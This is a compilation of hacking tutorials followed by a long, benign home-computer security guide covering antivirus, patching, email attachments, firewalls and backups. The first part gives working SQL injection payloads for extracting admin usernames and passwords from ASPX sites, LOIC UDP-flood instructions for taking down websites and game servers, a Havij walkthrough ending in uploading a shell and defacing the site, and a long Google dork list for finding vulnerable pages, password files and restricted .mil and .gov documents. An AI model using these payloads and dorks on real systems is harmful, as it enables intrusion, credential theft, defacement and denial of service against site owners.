
Hacking Aspx websites

hey guys in this tutorial i will show you how to make a injection on a aspx based website.

1) seach aaspx website.
for this step you can use one of this dorks

2) If you found one lets check if the website is vulnverable. Add this text after the url
"order by 1--"
example : order by 1--
Now you will get a Error : "Page not found" or something like that.

3) Lets go on and begin with the Injection the first step of every injection is to find out the columns.
for this step we use :
"having 1=1"
you only have to copy it behind the url
example : having 1=1

4) Well lets go on and search the tables. Use this code for it
and 1=convert
example : and 1=convert
The output is the first table of the databse. But this table don't helps you .
You need to find the admin table.
Use this query to get the next table :
"and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))"

example : and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))

Now we get the name of the admin table. The Admintable name is in this example "Administration"

5) Now lets get into the table Administration
use this query for it:
and 1=convert

"(int,(select top 1 column_name from information_schema.
columns where table_name = 'AdminMaster'))"

example : and 1=convert
(int,(select top 1 column_name from information_schema.
columns where table_name = 'AdminMaster'))

6) Our results are the tables "AdminName" and "AdminPassword"
Now have dont the most part of this injection. The last step is to find out Adminname and Adminpassword.

Query for Admin name :
"and 1=convert(int,(select top 1 AdminName from Administration))"
example : and 1=convert(int,(select top 1 AdminName from Administration))

Query for Admin pass :
"and 1=convert(int,(select top 1 AdminPassword from Administration))"
example : and 1=convert(int,(select top 1 AdminPassword from Administration))

7) So now your are nearly finish. You only need to find out the Admin Login Pannel.

UDP flood Attack

hey guys in this tutorial i will show you how to shutdown a website, a irc or a webserver
for this tutorial we will use a programm called loic download
you can do this manually too but with loic its faster and more easy

Ok lets start

1) search your victim. If your victim is a website the url of it is enough. If you want so shutdown a Irc or a Gameserver
you need the Ip of it.
Fill the Ip/url of your victim in the empty line and press "lock on". You will see the Ip/Url in the big line in the middle.

2)Now we have to change the settings for your attack.
Under the Ip/url line you can change some settings.
Change this :
1: Port : 80 (if its a website if its a server change it to server port)
2: Method : UPD
3: Threads : 900

3) Edit your UPD message. Write what you want

4) Start your attack and wait until its finish. The attack can take some minutes.
After the process search your victim and try to connect on it.
You will get a Error because the site isn't available.

Attention : Use always a proxie


PHP-NUKE remote read config Vulnerability!!!

PHP-NUKE remote read config Vulnerability!

Category:: webapps
$ Google dork:inurl:config.php dbuname dbpass intext:"PHP-NUKE"
# Tested on: Linux Back Track 5
# Demo site:

In File Config.php

We Have

And enj0y

Website hacking with Havij

Havji is a SQL injection tool. But is has more great skills like finding Admin panel, cracking hash ..
You can use it instead of the ordinary way of SQL injection.
Its especially for beginners a uselful programm
Ok now I will show you how to use it.

1) download it
2) install it
3) Put the website name in the empty line and click analyze
4) now go to tables. Now click "Get Tables"
5) now search those tables in which there are words like "username, password, members, admin" or something like that.
6) now click on get data and you will see the results
7) Ok lets find Admin panel now. click on Admin pannel and copy the url into it. It will search the login pannel by itself.
8) If you got the password in md5 format encode it with md5 cracker in havji.
9) Now you only need to open Admin panel and login.
Upload your shell and deface


Google Dork list

hey guys here you can see my google dork list i hope you have some use for it
allinurl: index.php id =
allinurl:? trainers.php id =
allinurl:? kaufen.php category =
allinurl:? article.php ID =
allinurl:? play_old.php id =
allinurl:? newsitem.php num =
allinurl:? readnews.php id =
allinurl:? top10.php cat =
allinurl:? historialeer.php num =
allinurl:? reagir.php num =
allinurl: Stray-Fragen-view.php num =
allinurl:? forum_bds.php num =
allinurl:? game.php id =
allinurl:? view_product.php id =
allinurl:? newsone.php id =
allinurl:? sw_comment.php id =
allinurl: news.php id =
allinurl:? avd_start.php avd =
allinurl:? event.php id =
allinurl:? Produkt-item.php id =
allinurl:? sql.php id =
allinurl:? news_view.php id =
allinurl:? select_biblio.php id =
allinurl:? humor.php id =
allinurl:? aboutbook.php id =
allinurl:? ogl_inet.php ogl_id =
allinurl:? fiche_spectacle.php id =
allinurl:? communique_detail.php id =
allinurl:? sem.php3 id =
allinurl:? kategorie.php4 id =
allinurl: news.php id =
allinurl: index.php id =
allinurl:? faq2.php id =
allinurl:? show_an.php id =
allinurl:? preview.php id =
allinurl:? loadpsb.php id =
allinurl:? opinions.php id =
allinurl:? spr.php id =
allinurl:? pages.php id =
allinurl:? announce.php id =
allinurl:? clanek.php4 id =
allinurl:? participant.php id =
allinurl:? download.php id =
allinurl: main.php id =
allinurl:? review.php id =
allinurl:? chappies.php id =
allinurl:? read.php id =
allinurl:? prod_detail.php id =
allinurl:? viewphoto.php id =
allinurl:? article.php id =
allinurl:? person.php id =
allinurl:? productinfo.php id =
allinurl:? showimg.php id =
allinurl:? view.php id =
allinurl:? website.php id =
allinurl:? hosting_info.php id =
allinurl:? gallery.php id =
allinurl:? rub.php idr =
allinurl:? view_faq.php id =
allinurl:? artikelinfo.php id =
allinurl:? detail.php ID =
allinurl: index.php =
allinurl:? profile_view.php id =
allinurl:? category.php id =
allinurl:? publications.php id =
allinurl:? fellows.php id =
allinurl:? downloads_info.php id =
allinurl:? prod_info.php id =
allinurl:? shop.php do = Teil & id =
allinurl:? productinfo.php id =
allinurl:? collectionitem.php id =
allinurl:? band_info.php id =
allinurl:? product.php id =
allinurl:? releases.php id =
allinurl:? ray.php id =
allinurl:? produit.php id =
allinurl:? pop.php id =
allinurl:? shopping.php id =
allinurl:? productdetail.php id =
allinurl:? post.php id =
allinurl:? viewshowdetail.php id =
allinurl:? clubpage.php id =
allinurl:? memberInfo.php id =
allinurl:? section.php id =
allinurl:? theme.php id =
allinurl:? page.php id =
allinurl: Schredder-categories.php id =
allinurl:? tradeCategory.php id =
allinurl:? product_ranges_view.php ID =
allinurl:? shop_category.php id =
allinurl:? transcript.php id =
allinurl: channel_id =
allinurl: item_id =
allinurl: newsid =
allinurl:? trainers.php id =
allinurl: news-full.php id =
allinurl:? news_display.php getId =
allinurl:? index2.php option =
allinurl:? readnews.php id =
allinurl:? top10.php cat =
allinurl:? newsone.php id =
allinurl:? event.php id =
allinurl:? Produkt-item.php id =
allinurl:? sql.php id =
allinurl:? aboutbook.php id =
allinurl:? preview.php id =
allinurl:? loadpsb.php id =
allinurl:? pages.php id =
allinurl:? clanek.php4 id =
allinurl:? announce.php id =
allinurl:? chappies.php id =
allinurl:? read.php id =
allinurl:? viewapp.php id =
allinurl:? viewphoto.php id =
allinurl:? rub.php idr =
allinurl:? galeri_info.php l =
allinurl:? review.php id =
allinurl: iniziativa.php in =?
allinurl:? curriculum.php id =
allinurl:? labels.php id =
allinurl:? story.php id =
allinurl:? look.php ID =
allinurl:? newsone.php id =
allinurl:? aboutbook.php id =
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

filetype:config web

gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurl:passwd filetype:txt
inurl:admin filetypeb

top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

Full Computer security

Securing your home computer is not a trivial task. There are many topics to consider and many steps to follow. They take time to learn and do. If you can, read this entire document before you begin to secure your computer. You’ll have a better understanding of the effort and all its facets. This ought to help you when you begin to tackle the tasks described here.

In the next part of this document, we describe two types of activities. Some you can do using the programs that came with your computer: working with passwords and email attachments, running programs, and backing up your work. For other activities, you might need to obtain some specialized programs: applying patches, and running anti-virus, firewall, and file encryption programs. Though some vendors’ products provide these features, we’ll assume your computer doesn’t have any of them so you’ll need to add all of them.

Here then is the list of tasks you need to do to secure your home computer. Their order is based on how intruders attack computers, beginning with the most-often used attack methods. By starting with the lower numbered tasks, you address the biggest problems you face in securing your home computer. Remember that most sections end with a reference to a web site that you can use to find an example of how to do the task on a Microsoft Windows 2000 computer.

Task 1 - Install and Use Anti-Virus Programs
If someone rang your doorbell and wanted to come into your living space to sell you something or to use your telephone, you’d need to make a decision whether or not to let them in. If they were a neighbor or someone you knew, you’d probably let them in. If you didn’t know them but believed their story and found them to be otherwise acceptable, say they were neat and clean and not threatening, you’d probably also let them in, but you’d watch them closely while they were in your space.

What are you doing here? You are profiling this person and then deciding what to do based on that profile. It’s your responsibility to be concerned about who enters your living space. Further, if you have children, you’ve probably also taught them how to deal with strangers who come to your door.

Anti-virus programs work much the same way. These programs look at the contents of each file, searching for specific patterns that match a profile – called a virus signature – of something known to be harmful. For each file that matches a signature, the anti-virus program typically provides several options on how to respond, such as removing the offending patterns or destroying the file.

To understand how anti-virus programs work, think about scam artists – people who visit your home to try to get you to buy a phony product or service, or to let them in. Once inside, they may try to steal your valuables or try to harm you in some way.

There are a variety of ways you might find out about a specific scam artist lurking in your neighborhood. Perhaps you see a television report or read a newspaper article about them. They might include pictures and excerpts of the story the scam artist uses to scam their victims. The news report gives you a profile of someone you need to be on the lookout for. You watch for that person until either the story fades away or you hear that they’ve been caught.

Anti-virus programs work much the same way. When the anti-virus program vendors learn about a new virus, they provide an updated set of virus signatures that include that new one. Through features provided by the updated anti-virus program, your home computer also automatically learns of this new virus and begins checking each file for it, along with checking for all the older viruses. However, unlike scam artists, viruses never completely fade away. Their signatures remain part of the master version of all virus signatures.

Suppose a scam artist was at your front door. What would you do? Perhaps you’d not encourage them to come in nor buy their product but, at the same time, you’d try not to upset them. You’d politely listen to their story and then send them on their way. After you closed the door, you may call the police or the telephone number given in the report that initially brought them to your attention.

With viruses, you often have the chance to react to them when they’ve been discovered on your home computer. Depending upon the specific characteristics of the virus, you might be able to clean the infected file. Or you might be forced to destroy the file and load a new copy from your backups or original distribution media. Your options depend upon your choice of anti-virus program and the virus that’s been detected.

In your living space, you look at those who come to your door and you look at what you receive in the mail. These are two of the ways that items can get into your living space, so you examine them, sometimes closely, sometimes not.

Viruses can reach your computer in many ways, through floppy disks, CD-ROMs, email, web sites, and downloaded files. All need to be checked for viruses each time you use them. In other words, when you insert a floppy disk into the drive, check it for viruses. When you receive email, check it for viruses (remember to use the KRESV tests described in Task 3 - Use Care When Reading Email with Attachments). When you download a file from the Internet, check it for viruses before using it. Your anti-virus program may let you specify all of these as places to check for viruses each time you operate on them. Your anti-virus program may also do this automatically. All you need to do is to open or run the file to cause it to be checked.

Just as you walk around your living space to see if everything is OK, you also need to “walk” around your home computer to see if there are any viruses lurking about. Most anti-virus programs let you schedule periodic exams of all files on your home computer on a regular basis, daily for example. If you leave your computer turned on over night, think about scheduling a full-system review during that time.

Some anti-virus programs have more advanced features that extend their recognition capabilities beyond virus signatures. Sometimes a file won’t match any of the known signatures, but it may have some of the characteristics of a virus. This is comparable to getting that “there’s something not quite right here, so I’m not going to let them in” feeling as you greet someone at your door. These heuristic tests, as they’re called, help you to keep up with new viruses that aren’t yet defined in your list of virus signatures.

An anti-virus program is frequently an add-on to your home computer, though your newly purchased computer might include a trial version. At some point, say after 60 days, you must purchase it to continue using it. To decide whether to make that purchase or to look elsewhere, use these steps for evaluating anti-virus programs:

The Demand test: Can you check a file on demand, for example, when you want to send an attachment as part of the KRESV tests?
The Update test: Can you update the virus signatures automatically? Daily is best.
The Respond test: What are all the ways that you can respond to an infected file? Can the virus checker clean a file?
The Check test: Can you check every file that gets to your home computer, no matter how it gets there, and can those checks be automated?
The Heuristics test: Does the virus checker do heuristics tests? How are these defined?
These tests – the DURCH tests – help you compare anti-virus programs. Once you’ve made your selection, install it and use all of its capabilities all of the time.

Intruders are the most successful in attacking all computers – not just home computers – when they use viruses and worms. Installing an anti-virus program and keeping it up to date is among the best defenses for your home computer. If your financial resources are limited, they are better spent purchasing a commercial anti-virus program than anything else.

Use a Checklist to help you think anti-virus issues.
Example: Operating an Anti-Virus Program.

Task 2 - Keep Your System Patched
If one of your appliances broke, you’d probably try to have it repaired. You’d call a repairperson whom you hope could do the job. You’d get an estimate and then you’d either get it fixed or replace it. Your goal is to somehow restore the functions that the appliance provides.

What do you do when a software “appliance” – a program – or the operating system itself breaks? How do you restore the functions that they provide? Do you know whom to call or even where to look to determine what to do next?

Most vendors provide patches that are supposed to fix bugs in their products. Frequently these patches do what they’re supposed to do. However, sometimes a patch fixes one problem but causes another. For example, did you ever have a repairperson fix an appliance but in the process, they scratched the floor or damaged a countertop during their visit? For a computer, the repair cycle might have to be repeated until a patch completely fixes a problem.

Vendors often provide free patches on their web sites. When you purchase programs, it’s a good idea to see if and how the vendor supplies patches, and if and how they provide a way to ask questions about their products. Just as appliance vendors often sell extended warranties for their products, some software vendors may also sell support for theirs.

Have you ever received a recall notice for your car or another product you’ve purchased? Vendors send these notices to product owners when a safety-related problem has been discovered. Registering your purchase through the warranty card gives the vendor the information they need to contact you if there is a recall.

Program vendors also provide a recall-like service. You can receive patch notices through email by subscribing to mailing lists operated by the programs’ vendors. Through this type of service, you can learn about problems with your computer even before you discover them and, hopefully, before intruders have the chance to exploit them. Consult the vendor’s web site to see how to get email notices about patches as soon as they’re available.

Some vendors have gone beyond mailing lists. They provide programs bundled with their systems that automatically contact their web sites looking for patches specifically for your home computer. These automatic updates tell you when patches are available, download them, and even install them. You can tailor the update features to do only want you want, such as just telling you something new is waiting but doing nothing more.

While the patching process is getting easier, even to the point where it can be completely automated, it is not yet foolproof. In some cases, installing a patch can cause another seemingly unrelated program to break. The challenge is to do as much homework as you can to learn what a patch is supposed to do and what problems it might cause once you’ve installed it.

This is a hard job. Often, the vendors don’t tell you about problems their patches can cause. Why? Because it is simply impossible to test all possible programs with all possible patches to discover unexpected side effects. Imagine doing that job and then continuing to do that for each new program and patch that comes along. Vendors rely on their customers to tell them when something unexpected happens once a patch is installed. So, if this happens to you, let them know.

Imagine then that you’ve either found a patch on the vendor’s site or you’ve received notice that a patch is available. What do you do next? Follow the steps below to evaluate a patch before you install it:

The Affected test: Does this patch affect one of the programs on your computer? If it doesn’t affect your computer, you’re done. Whew!
The Break test: Can you tell from the vendor’s web site or the patch’s description if installing it breaks something else that you care about? If installation does break something, then you have to decide how to proceed. Try notifying the vendor of the program that might break to learn what their strategy is for addressing this problem. Also, use your web browser to learn if anyone else has experienced this problem and what he or she did about it.
The Undo test: Can you undo the patch? That is, can you restore your computer to the way it was before you installed the patch? Currently, vendors are building most patches with an uninstall feature that enables you to remove a patch that has unwanted consequences. In addition, some computers also come with features that help you restore them to a previously known and working state should there be a problem. You need to know what your computer provides so that you can undo a patch if necessary.
Recall from the Introduction that intruders exploit vulnerabilities to gain access to home computers. How do intruders find out about these vulnerabilities? In many cases, they read the same vendor mailing lists and use the same automatic notification schemes that you use. This means that you need to evaluate and install patches on your home computer as soon as they’re available. The longer a vulnerability is known, the greater the chances are that an intruder will find it on your home computer and exploit it. With the ABU tests, you can quickly evaluate and install patches to keep intruders off your home computer.

One last thing: patches are usually distributed as programs. This means that you need to use the DCAL steps described in Task 7 - Use Care When Downloading and Installing Programs before loading and installing a patch. Intruders often take advantage of vulnerabilities wherever they may be. In many cases, the vulnerabilities they exploit may have patches, but those patches were not installed. For your home computer, make time to keep your programs patched wherever possible. If you can’t patch a program, shop around for an equivalent program and use it until the original program is fixed or you’ve abandoned it in favor of something more reliable.

You can spend money on maintenance where you get patches for programs, but that’s usually not necessary. Since most vendors provide free patches, mailing lists, and automatic updates, keeping your computer patched usually only costs you time.

Use a Worksheet to record your important patch information.
Example: Installing Patches.

Task 3 - Use Care When Reading Email with Attachments
We’ve all heard stories about people receiving an item in the mail that in some way caused them harm. We’ve heard of letter bombs and exploding packages, and in 2001, we learned about Anthrax-laden letters. Although their frequency is low, they do make news.

These unsolicited items are sent to unsuspecting recipients. They may contain a return address, a provocative envelope, or something else that encourages its receiver to open it. This technique is called social engineering. Because we are trusting and curious, social engineering is often effective.

In the case of the Anthrax letters addressed to United States senators, the envelopes contained a school’s return address as an inducement to open them. What government official wouldn’t want to serve their constituency by reading and responding to a letter supposedly sent by a class at a school, especially an elementary school? By opening the letter and subsequently spreading its lethal contents, the recipient complied with the wishes of the sender, a key foundation of social engineering. In the pre-Anthrax letter days, a mail handler might have given little thought to the contents of the letter or the validity of the return address. Those days are behind us.

You probably receive lots of mail each day, much of it unsolicited and containing unfamiliar but plausible return addresses. Some of this mail uses social engineering to tell you of a contest that you may have won or the details of a product that you might like. The sender is trying to encourage you to open the letter, read its contents, and interact with them in some way that is financially beneficial – to them. Even today, many of us open letters to learn what we’ve won or what fantastic deal awaits us. Since there are few consequences, there’s no harm in opening them.

Email-borne viruses and worms operate much the same way, except there are consequences, sometimes significant ones. Malicious email often contains a return address of someone we know and often has a provocative Subject line. This is social engineering at its finest – something we want to read from someone we know.

Email viruses and worms are fairly common. If you’ve not received one, chances are you will. Here are steps you can use to help you decide what to do with every email message with an attachment that you receive. You should only read a message that passes all of these tests.

The Know test: Is the email from someone that you know?
The Received test: Have you received email from this sender before?
The Expect test: Were you expecting email with an attachment from this sender?
The Sense test: Does email from the sender with the contents as described in the Subject line and the name of the attachment(s) make sense? For example, would you expect the sender – let’s say your Mother – to send you an email message with the Subject line “Here you have, ;o)” that contains a message with attachment – let’s say AnnaKournikova.jpg.vbs? A message like that probably doesn’t make sense. In fact, it happens to be an instance of the Anna Kournikova worm, and reading it can damage your system.
The Virus test: Does this email contain a virus? To determine this, you need to install and use an anti-virus program. That task is described in Task 1 - Install and Use Anti-Virus Programs.
You should apply these five tests – KRESV – to every piece of email with an attachment that you receive. If any test fails, toss that email. If they all pass, then you still need to exercise care and watch for unexpected results as you read it.

Now, given the KRESV tests, imagine that you want to send email with an attachment to someone with whom you’ve never corresponded – what should you do? Here’s a set of steps to follow to begin an email dialogue with someone.

Since the recipient doesn’t already Know you, you need to send them an introductory email. It must not contain an attachment. Basically, you’re introducing yourself and asking their permission to send email with an attachment that they may otherwise be suspicious of. Tell them who you are, what you’d like to do, and ask for permission to continue.
This introductory email qualifies as the mail Received from you.
Hopefully, they’ll respond; and if they do, honor their wishes. If they choose not to receive email with an attachment from you, don’t send one. If you never hear from them, try your introductory email one more time.
If they accept your offer to receive email with an attachment, send it off. They will Know you and will have Received email from you before. They will also Expect this email with an attachment, so you’ve satisfied the first three requirements of the KRESV tests.
Whatever you send should make Sense to them. Don’t use a provocative Subject line or any other social engineering practice to encourage them to read your email.
Check the attachments for Viruses. This is again based on having virus-checking programs, and we’ll discuss that later.
The KRESV tests help you focus on the most important issues when sending and receiving email with attachments. Use it every time you send email, but be aware that there is no foolproof scheme for working with email, or security in general. You still need to exercise care. While an anti-virus program alerts you to many viruses that may find their way to your home computer, there will always be a lag between when a virus is discovered and when anti-virus program vendors provide the new virus signature. This means that you shouldn’t rely entirely on your anti-virus programs. You must continue to exercise care when reading email.

Use a checklist to help you make decisions about opening email attachments.

Task 4 - Install and Use a Firewall Program
This section describes a firewall, its importance to your home computer strategy, and a way to think about the job you need to do. We’re going to depart from our “computer-is-like-a-house-and-the-things-in-it” analogy to use another that you are probably also familiar with: an office building.

Have you ever visited a business where you first stopped at the reception desk to interact with a security guard? That guard’s job is to assess everybody who wishes to enter or leave the building to decide if they should continue on or be stopped. The guard keeps the unwanted out and permits only appropriate people and objects to enter and leave the business’s premises.

Let’s dig deeper into this analogy. When someone enters a building, the security guard usually greets them. If they have an appropriate identification badge, they show it to the guard or swipe it through a reader. If all is OK, they pass through the guard’s checkpoint. However, if something’s wrong or if they are a visitor, they must first stop at the guard desk.

The guard asks whom they wish to see. The guard may also ask for identification such as a driver’s license or their company ID. The guard reviews the list of expected guests to see if this person is approved to visit the party in question. If the guard decides everything is all right, the visitor may pass. The visitor usually signs a logbook with their name, the company they represent, whom they are seeing, and the time of day.

On a computer, the firewall acts much like a guard when it looks at network traffic destined for or received from another computer. The firewall determines if that traffic should continue on to its destination or be stopped. The firewall “guard” is important because it keeps the unwanted out and permits only appropriate traffic to enter and leave the computer.

To do this job, the firewall has to look at every piece of information – every packet – that tries to enter or leave a computer. Each packet is labeled with where it came from and where it wants to go. Some packets are allowed to go anywhere (the employee with the ID badge) while others can only go to specific places (visitors for a specific person). If the firewall allows the packet to proceed (being acceptable according to the rules), it moves the packet on its way to the destination. In most cases, the firewall records where the packet came from, where it’s going, and when it was seen. For people entering a building, this is similar to the ID card system keeping track of who enters or the visitor signing the visitor’s log.

The building’s guard may do a few more tasks before deciding that the person can pass. If the person is a visitor and is not on the visitors list, the guard calls the employee being visited to announce the visitor’s arrival and to ask if they may pass. If the employee accepts the visitor, they may proceed. The guard may also give the visitor a badge that identifies them as a visitor. That badge may limit where in the building they can go and indicate if they need to be escorted. Finally, no matter whether the person is a visitor or an employee, the guard may inspect their briefcase or computer case before they pass.

The firewall can also check whether a given packet should pass, allowing the computer’s user to respond to unanticipated network traffic (just as the guard does with the unexpected visitor). Individual packets can be allowed to pass, or the firewall can be changed to allow all future packets of the same type to pass. Some firewalls have advanced capabilities that make it possible to direct packets to a different destination and perhaps even have their contents concealed inside other packets (similar to the visitor being escorted). Finally, firewalls can filter packets based not only on their point of origin or destination, but also on their content (inspecting the briefcase or computer case before being allowed to pass).

Back to the office building, when employees leave the building, they may also have to swipe their ID card to show that they’ve left. A visitor signs out and returns their temporary badge. Both may be subject to having their possessions inspected before being allowed to leave.

Firewalls can also recognize and record when a computer-to-computer connection ends. If the connection was temporary (like a visitor), the firewall rules can change to deny future similar connections until the system’s user authorizes them (just as visitors must re-identify themselves and be re-approved by an employee). Finally, outgoing connections can also be filtered according to content (again, similar to inspecting possessions at the exit).

What does this all mean? It means that with a firewall, you can control which packets are allowed to enter your home computer and which are allowed to leave. That’s the easy part.

The hard part is deciding the details about the packets that are allowed to enter and exit your home computer. If your firewall supports content filtering, you also need to learn which content to allow and which not to allow. To help you get a handle on this harder task, let’s return to our security guard analogy.

Imagine that you are that security guard and it’s your first day on the job. You have to decide who’s allowed in, who’s allowed out, and what people can bring into and take out of the building. How do you do this?

One strategy is to be very conservative: let no one in or out and let no possessions in or out. This is very simple, very easy to achieve, but not particularly helpful to the business if none of its employees or visitors can get in or out. Nor is it helpful if they can’t bring anything with them. With this type of strategy, your tenure as a security guard may be short-lived.

If you try this, you quickly learn that you need to change your strategy to allow people in and out only if they have acceptable identification and possessions using some agreed-to criteria. Add the requirement that if you don’t meet the precise criteria for admittance, you don’t get in.

With most firewalls, you can do the same thing. You can program your firewall to let nothing in and nothing out. Period. This is a deny-all firewall strategy and it does work, though it effectively disconnects you from the Internet. It is impractical for most home computers.

You can do what the security guard did: review each packet (employee or visitor) to see where it’s coming from and where it’s going. Some firewall products let you easily review each packet so that you can decide what to do with it. When you are shopping for a firewall, look for this review feature because it can be quite helpful. Practically speaking, it isn’t easy to decide which traffic is all right and which is not all right. Any feature that makes this job easier helps you achieve your goal of securing your home computer.

Just like the security guard who learns that anybody with a company photo ID is allowed to pass, you too can create firewall rules that allow traffic to pass without reviewing each packet each time. For example, you may choose to allow your Internet browsers to visit any web site. This rule would define the source of that traffic to be your browsers (Netscape Navigator and Microsoft Internet Explorer, for example) and the destination location to be any web server. This means that anybody using your home computer could visit any Internet web site, as long as that web server used the well-known standard locations.

Now that you have an idea of what your firewall security guard is trying to do, you need a method for gathering information and programming your firewall. Here is a set of steps to use to do just that:

The Program test: What’s the program that wants to make a connection to the Internet? Although many programs may need to make the same type of connection to the same Internet destination, you need to know the name of each. Avoid general rules that allow all programs to make a connection. This often results in unwanted and unchecked behavior.
The Location test: What’s the Internet location of the computer system to which your computer wants to connect? Locations consist of an address and a port number. Sometimes a program is allowed to connect to any Internet location, such as a web browser connecting to any web server. Again, you want to limit programs so that they only connect to specific locations where possible.
The Allowed test: Is this connection allowed or denied? Your firewall rules will contain some of each.
The Temporary test: Is this connection temporary or permanent? For example, if you’re going to connect to this specific location more than five times each time you use the computer, you probably want to make the connection permanent. This means that you ought to add a rule to your firewall rules. If you aren’t going to make this connection often, you should define it as temporary.
With each connection, apply the PLAT tests to get the information you need to build a firewall rule. The answer to the PLAT tests tells you if you need to include a new firewall rule for this new connection. For most firewall programs, you can temporarily allow a connection but avoid making it permanent by not including it in your rules. Where possible, allow only temporary connections.

As you run each program on your home computer, you’ll learn how it uses the Internet. Slowly you’ll begin to build the set of rules that define what traffic is allowed into and out of your computer. By only letting in and out what you approve and denying all else, you will strike a practical balance between allowing everything and allowing nothing in or out.

Along the way, you may come across exceptions to your rules. For example, you might decide that anybody who uses your home computer can visit any web site except a chosen few web sites. This is analogous to the security guard letting every employee pass except a few who need more attention first.

To do this with firewall rules, the exception rules must be listed before the general rules. For example, this means that the web sites whose connections are not allowed must be listed before the rules that allow all connections to any web site.

Why? Most firewall programs search their rules starting from the first through the last. When the firewall finds a rule that matches the packet being examined, the firewall honors it, does what the rule says, and looks no further. For example, if the firewall finds the general rule allowing any web site connections first, it honors this rule and doesn’t look further for rules that might deny such a connection. So, the order of firewall rules is important.

Many firewalls can be programmed to require a password before changing the rules. This extra level of protection safeguards against unwanted changes no matter their source, that is, you, an intruder, or another user. Follow the guidance in Task 6 - Use Strong Passwords when assigning a password to your firewall.

Finally, make a backup of your firewall rules. You’ve probably taken a lot of time to build and tune them to match how your home computer is used. These rules are important to your computer’s security, so back them up using the guidance in Task 5 - Make Backups of Important Files and Folders.

Firewalls come in two general types: hardware and software (programs). The software versions also come in two types: free versions and commercial versions (ones that you purchase). At a minimum, you should use one of the free versions on your home computer. This is especially important if you have a laptop that you connect to your home network as well as a network at a hotel, a conference, or your office.

If you can afford a hardware firewall, you should install one of these too. We’ve recommended this as something to do later. (Firewall programs are Task 4 on our list of recommended actions, and hardware firewalls are Task 8.) The same issues apply to the hardware versions that apply to the software versions. Many can also be password protected against unwanted changes. Search the Internet with your browser to see what’s available and what they cost. The price of hardware firewalls is coming down as the demand grows.

A firewall is your security guard that stands between your home computer and the Internet. It lets you control which traffic your computer accepts. It also controls which of your programs can connect to the Internet. With a firewall, you define which connections between your computer and other computers on the Internet are allowed and which are denied. There are free firewall products that provide the capabilities you need to secure your home computer. Commercial versions have even more features that can further protect your computer.

Firewalls are an important part of your home computer’s security defenses

Use a worksheet to record your firewall decisions.
Example: Operating a Firewall Program.

Task 5 - Make Backups of Important Files and Folders
Whether you know it or not, you’ve divided everything you own into two broad categories: those items you can replace and those you can’t. For the items you can’t replace, you’ve probably stored them in a safe place, either somewhere in your living space or elsewhere, in a lockbox at a bank, for example. In either case, you’ve probably also bought insurance that provides the funds you’d need to buy replacements. Your insurance policy covers almost everything you own.

On your home computer, have you similarly divided everything into the same categories? What have you done about the items – files in this case – that you can’t replace? Examples are the files that make up your checking account records, that novel you’ve been writing for the past few years, and those pictures you took last summer with your digital camera. What happens if your computer malfunctions or is destroyed by a successful attacker? Are those files gone forever?

Now think about your car for a moment. Do you have a spare tire? Is it inflated? When was the last time you used it? Can you imagine buying a car without a spare tire? Even if you bought a used car without a spare, how soon did you buy a spare so that you’d have one when you needed it?

Think back to your home computer. Do you have a “spare tire,” meaning a way to continue computing when you have a “blowout” caused by a malfunction or an intruder? Said another way, can you back up your files onto some other media so that you can recover them if you need to? If you’d never buy a car without a spare tire, why did you buy a computer without a device to back up your files?

When deciding what to do about backing up files on your computer, ask these questions:

The Files question: What files should you back up? The files you select are those that you can neither easily recreate nor reinstall from somewhere else, such as the CD-ROMs or the floppy disks that came with your computer.
Be realistic. That check register you printed does not constitute a backup from which you can easily recreate the files needed by your checking account program. You’re probably not going to re-enter all that data if the files are destroyed. Just as you protect your irreplaceable valuables, back up the files you cannot replace, easily or otherwise.

The Often question: How often should you back them up? In the best of all cases, you should back up a file every time it changes. If you don’t, you’ll have to reintroduce all the changes that happened since your last backup. Just as you store your precious jewelry in a lockbox at the local bank lest the lucky robber find it in your jewelry box, you need to store your files safely (back them up) after every use (change in the file) lest an intruder destroys the file or there’s a system catastrophe.
The Media question: Where should you back them up to; that is, what media should you use to hold backed up files? The answer is: whatever you have. It’s a question of how many of that media you have to use and how convenient it is. For example, most computers have a floppy disk drive. You could back up your irreplaceable files to floppies. That process just takes lots of time and may not be as convenient as using another media. Larger capacity removable disk drives and writable CD-ROMs also work well, take less time, and are more convenient.
If you don’t have a backup device, there are alternatives. There are Internet services that let you back up your files to another Internet computer. Some of these services provide “transparent access” to the backups. That is, they look like another hard drive attached to your computer. You use the file copy scheme that your computer provides to back up files and recover them from backed up storage. To find these services, do some Internet searches using your browser.

Remember that the information you transfer across the Internet could be viewed and captured by others; that is, the information is in the clear. Be sensitive to that if you use an Internet-based backup computer. In addition, you need to be able to trust the information when you recover a file from that service.

The Store question: Where should you store that media once it contains your backed up files? No matter how you back up your files, you need to be concerned about where those backed up copies live.
You already know that intruders try to break into your home computer to gain access to your files and your computer’s resources. Another way to gain access to the same information is by stealing your backups. It is more difficult, though, since a robber must physically be where your backups are, whereas an intruder can access your home computer from literally anywhere in the world. The key is to know where the media is that contains your backed up files.

Just like important papers stored in a fireproof container at your house, you also need to be concerned about your backups being destroyed if your living space is destroyed or damaged. This means that you ought to keep a copy of your backed up files in a fireproof container or somewhere beyond your living space, your office for example. It is the eternal compromise between security and usability. If you need to recover a file and the backed up copies are at the office, that’s inconvenient. However, while storing them at home is more convenient and more usable, they share the same risks that your computer faces should your living space be destroyed. Be aware of the issues and make a conscious decision, perhaps keeping copies in both places.

If you have that spare tire for your car or a lockbox for your valuables, you’ve already planned for the worst that can happen around your living space. Continue that good practice by backing up your critical files onto media that you can safely store elsewhere. Do those backups often enough that you can capture the changes you’ve made. With the FOMS questions, you have a structured approach to use to back up your critical files. You’ve now planned for the worst.

